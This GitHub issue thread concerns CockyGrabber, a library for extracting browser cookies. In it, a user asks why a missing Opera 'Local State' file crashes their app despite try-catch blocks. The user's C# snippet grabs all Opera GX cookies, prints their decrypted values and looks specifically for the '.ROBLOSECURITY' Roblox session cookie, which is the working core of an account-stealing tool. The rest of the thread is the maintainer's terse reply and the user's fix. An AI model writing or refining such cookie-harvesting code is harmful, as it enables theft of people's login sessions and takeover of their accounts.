### ISSUE TITLE
App Crashing

### ISSUE THREAD

**Issue by heapleak-official** [MoistCoder/CockyGrabber#46]
![image](https://user-images.githubusercontent.com/116805040/232575983-7514cab1-d4ff-437b-9803-21fe0eacfda1.png)

Error: CockyGrabber.GrabberException: 'The file that stores the key for the decryption of encrypted values (Local State) could not be found: C:\Users\cuciu\AppData\Roaming\Opera Software\Opera Stable\Local State'

Why is it still crashing my app if I got try - catch blocks

```cs
try
{
    OperaGxGrabber grabber = new OperaGxGrabber();
    var cookies = await Task.Run(() => grabber.GetCookies());
    foreach(var cookie in cookies)
    {
        string cookieHostname = cookie.HostKey;
        string cookieName = cookie.Name;
        string cookieValue = cookie.DecryptedValue;
        Console.WriteLine($ "{cookie.HostKey}: {cookie.Name} = {cookie.DecryptedValue}");
        if (cookieName.Contains(".ROBLOSECURITY"))
        {}
    }
}
catch (Exception ex)
{
    Console.WriteLine($ "An error occurred: {ex.Message}");
}
```

**Comment by MoistCoder** [comment]
Please listen to the to the exception message. It literally tells you that the file is missing.

**Comment by heapleak-official** [comment]
I know the files are missing but why is it crashing my app if I added try - catch blocks?
Why isnt it just throwing the error in console

I managed to fix it by adding try - catch blocks here

![image](https://user-images.githubusercontent.com/116805040/232586503-0edd68ba-f930-4dbd-9792-d8390fd978a4.png)


And 

![image](https://user-images.githubusercontent.com/116805040/232586553-fb99400d-eb7b-432c-98e3-574d52b295f3.png)
